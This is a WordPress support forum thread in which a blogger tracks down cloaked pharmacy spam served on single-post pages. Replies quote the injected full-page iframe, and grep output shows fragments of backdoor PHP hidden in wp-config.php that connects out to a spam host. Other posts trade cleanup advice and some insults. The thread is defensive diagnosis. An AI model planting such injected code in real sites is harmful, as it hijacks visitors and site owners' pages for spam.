is this some new spam attack?

Resolved nothinghappens
(@nothinghappens)

15 years, 10 months ago

I’ve been looking through the forums, googling my butt off, and can’t find anything that describes what I’m experiencing. And I need help getting rid of it.

A while back one of my posts got compromised with spam — not in the form of a comment, or the post itself being edited, but rather this: the posts showed up normally on home page, but when you click a post title to go to the individual post (say, to leave a comment) you get a spam page. Not a bunch of spam links inserted into the post/page content, mind you, but a completely different web page hawking cheap drugs. However the URL is still the same URL as normal to view the post. This doesn’t start happening up right away after publishing the post, but some time a little later.

The first time it happened, I figured it for a one-off deal, and promptly deleted the post and just copied its contents into a new post. But yesterday it happened again, so I thought I’d better take new measures.

First, I was long overdue for an upgrade anyway (was still using WordPress 2.0) so I installed the automatic upgrade plugin and upgraded to the latest. Then I changed my user password and ssh/ftp password at my web host. Then I posted to the blog saying, in effect, “sorry about the spam thing, but I went ahead and did this and this and hopefully it won’t happen again.”

This morning I find out it happened again — to that very post:

http://nothinghappens.net — the home page, post looks normal
http://nothinghappens.net/?p=316 — holy crap wtf

Here are some more interesting details I’ve dug up: If you add a trailing / to the URL you get the post again instead of the spam site. Check it out: http://nothinghappens.net/?p=316/ However, before you tell me to check my .htaccess — I don’t have one. Also, I looked at the post’s record in the database via phpMyAdmin and nothing’s been done to it there.

Viewing 15 replies - 16 through 30 (of 35 total)

← 1 2 3 →

ivovic
(@ivovic)

15 years, 10 months ago

hey NH… please be big enough to come back here when you finally decide to rm -rf the whole lot. I just want to know how long it takes for an otherwise intelligent person to actually take the advice they came here asking for.

(oh and be sure to look for perl files too, a popular choice of drop-in back doors)

Don’t say I didn’t help.

moshu
(@moshu)

15 years, 10 months ago

YOU should read carefully all the resources offered.
You were hacked before the upgrade, and in many cases the upgrade itself will NOT clean up the site; e.g. one of the threads referenced by Rosie mentions that the “bad files” are in the wp-content/uploads/200x/34/ and similar folders, and we all know there is no month “34” or “2” (should be 02), so watch out for those and everything else that others already figured out.

I repeat, too: the upgrade (especially an automated one) does NOT help in itself: during an upgrade the wp-content folder is never touched… so, plenty of unchanged things could be there in different files and subfolders. I can testify that while helping a WP user in a similar situation, when he gave me access to his server, I found ALL the bad files (bad guys? 🙂 in the wp-content folder.

And if you took the time to read all those threads that were suggested to you by RosieBanks at the beginning – you could have saved a lot of time and bandwidth. Post less and read more.

Good luck!

Thread Starter nothinghappens
(@nothinghappens)

15 years, 10 months ago

I don’t have a wp-content/uploads/ folder. But thanks for pointing that out, I’ll have another look around wp-content. So far I’ve already examined the themes directory pretty closely.

And I did read those threads, but they seemed largely to do with rather different issues than this one — this isn’t comment spam, it’s displaying an entirely different page in place of the post’s page.
Rove
(@rove)

15 years, 10 months ago
When i look at the source of the ?p=316 page i see two interesting lines:
```
<style>BODY {overflow:hidden; margin:0px;padding:0px;}</style>
<iframe border=0 width="100%" height="100%" src="http://km23548.keymachine.de/sutra/in.cgi?default&group=farma&parameter=celebrex+delisted+in+alberta"></iframe>
```
Other thing you can try is to temporarily switch to the classic theme and see if the problem is still there.

Edit: after i wrote this i checked your page again and everything seems ok now? Did you find something?
Thread Starter nothinghappens
(@nothinghappens)

15 years, 10 months ago

ah-ha!

One of my readers pointed this out:

So, I’ve had a couple of minutes for this, so didn’t look too deeply, but there’s an iframe in that HTML with the guilty party’s URL in it. Googling on that turned up some links, among them this one, which might be a good place to start.

The URL in question was something at keymachine.de — so I figured if something has been modified, it’s being modified to serve up content from keymachine.de, so the text “keymachine” is likely to be part of the inserted code. So:

[boo]$ grep -R keymachine .
./wp-config.php: $sock = @fsockopen(‘km20725.keymachine.de’, 80);
./wp-config.php: fwrite ($sock, ‘GET http://km20725.keymachine.de/server/index.php?host=’.$_SERVER[‘SERVER_NAME’].’&p=’.$_GET[‘p’].’ HTTP/1.0′.”\r\n”);
./wp-config.php: fwrite ($sock, ‘Host: km20725.keymachine.de’.”\r\n\r\n”);

There’s our spammer. It didn’t occur to me previously that among the files the upgrade would leave alone would be wp-config.php, but that does make sense, doesn’t it? Not sure how or when wp-config.php would have been compromised, could have been while moving the site from a different host (various files had their permissions temporarily changed at certain times)… but there it was. A couple minutes in vim deleting the offending slab of code and things are back to normal.

So no, Mr. Cool-Sunglasses-Guy, I still say you didn’t help. But thanks for playing.

Now this post can sit here to be found by others in the future who find themselves with the same issue, and will save THEM hours of re-installing every single file instead of just editing one. Yay! My good deed for the day.

This is why I’m hot. You ain’t cause you not. 😀

ivovic
(@ivovic)

15 years, 10 months ago

wow, that last line really makes me want to be your friend so much right now.

now we wait and see how long until you get hit again.

for the record, it’s been over an hour since I first posted in this thread, and more than 3 since rosie posted.

fresh files would have solved this for you before I even got here… happy-dance yourself into a coma if you like, but it seems you really *do* have all this spare time after all.

See you again soon.

Like I said, let us know when you actually do rm -rf the lot.

Thread Starter nothinghappens
(@nothinghappens)

15 years, 10 months ago

3 hours I spent so someone else won’t have to then, I guess. Three hours that were also spent tightening up my file permissions and various other helpful things to try to ward off future problems. And for the record, I don’t think I ever claimed to want you as a friend.

jonimueller
(@jonimueller)

15 years, 10 months ago

Great news that you solved it. I’d add some keywords to this thread and mark it resolved to help others in the same bind.

ivovic
(@ivovic)

15 years, 10 months ago

NH I’m sorry the thought of this is so horrible for you, but there’s just no way to be certain that you’ve cleared it up until you wipe the lot.

Anyone reading this should consider this solution as effective as pain killers applied to a bullet wound. You may feel fine right now, but the real problem is probably still there.

All you’ve done is make it less noticable.

I can’t believe how resistant you are to this. Take a moment and ask yourself “if I were hacking something and could write to files, would I stop at changing just one really easily noticable one?”

(probably best if people don’t find this and instead jump straight to a solution that doesn’t rely on crossing fingers and hoping for the best – clearing out a wordpress install and reloading fresh plugins takes less than 20 minutes).

Thread Starter nothinghappens
(@nothinghappens)

15 years, 10 months ago

Good idea. Feel free to suggest more helpful tags/keywords than I have chosen — I added “redirect” since some folks could conceivably mistake it for something that redirects to a different site, and “post” since it “replaces” the page for viewing an individual post, but those seem awfully general…

Ivovic: the less easily noticeable files would largely have been replaced in the upgrade. If I doubt this, I can check their timestamps. The files it leaves alone are fairly easy to deduce. I think maybe it’s just that rm -rf is the only linux command you know. 😀

ivovic
(@ivovic)

15 years, 10 months ago

you could try being less of a fscking asshole. clearly I’m still here because I’m concerned that you’ll sway the minds of other like-minded lazy spectators, so if nothing else, that earns me your tolerance.

you can’t replace new files in an upgrade, genius… as someone who isn’t nearly as selfish with his time as you are, I’ve been through enough of these things to see all kinds of additional files, modded files, hidden files, and obfuscated files.

How many of wordpresses files can you name? done a compare with what’s uploaded as compared with what’s in the zip? how about your plugins, no foreign files in there?

How the hell would you know? you haven’t even looked.

and honestly, if you did actually look at all that, then you’re more of a moron than I give you credit for, since clearing it out would have been miles faster.

for the record, it’s a unix command, some of us used the command line before it became cool.

moshu
(@moshu)

15 years, 10 months ago

Guys, let’s stop the personal remarks, and focus on the issue. Otherwise I’ll be forced to delete posts and close the thread.
Play nice…

moshu
(@moshu)

15 years, 10 months ago

[I told ya I am quick with the delete button!]

Thread Starter nothinghappens
(@nothinghappens)

15 years, 10 months ago

What does anyone think of the suggestion of setting the permissions of config.php to 640? Has it been suggested before? Would it be helpful? It does contain a database connection password after all. Since my particular issue turned out to involve config.php (the header and footer in my theme were also full of spam links, but I know not whether that was from the same party), that thought occurred to me. I went ahead and chmod’d it as such. Oh, and personal attacks directed /at/ me don’t warrant a delete, naturally, so flame away.

moshu
(@moshu)

15 years, 10 months ago

I did not delete anything from BEFORE – only whatever has been posted AFTER my warning.